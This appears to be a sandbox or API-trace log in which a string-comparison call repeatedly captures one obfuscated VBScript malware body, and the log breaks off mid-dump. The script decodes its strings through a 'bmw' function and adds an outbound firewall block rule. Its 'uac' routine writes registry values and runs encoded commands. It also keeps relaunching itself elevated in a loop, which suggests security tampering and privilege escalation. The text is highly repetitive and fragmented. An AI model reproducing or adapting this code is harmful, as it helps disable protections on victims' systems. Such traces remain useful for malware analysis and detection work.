NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.977] wcsncmp (_String1="1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.977] wcsncmp (_String1=",str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.977] wcsncmp (_String1="str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.977] wcsncmp (_String1="tr2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), 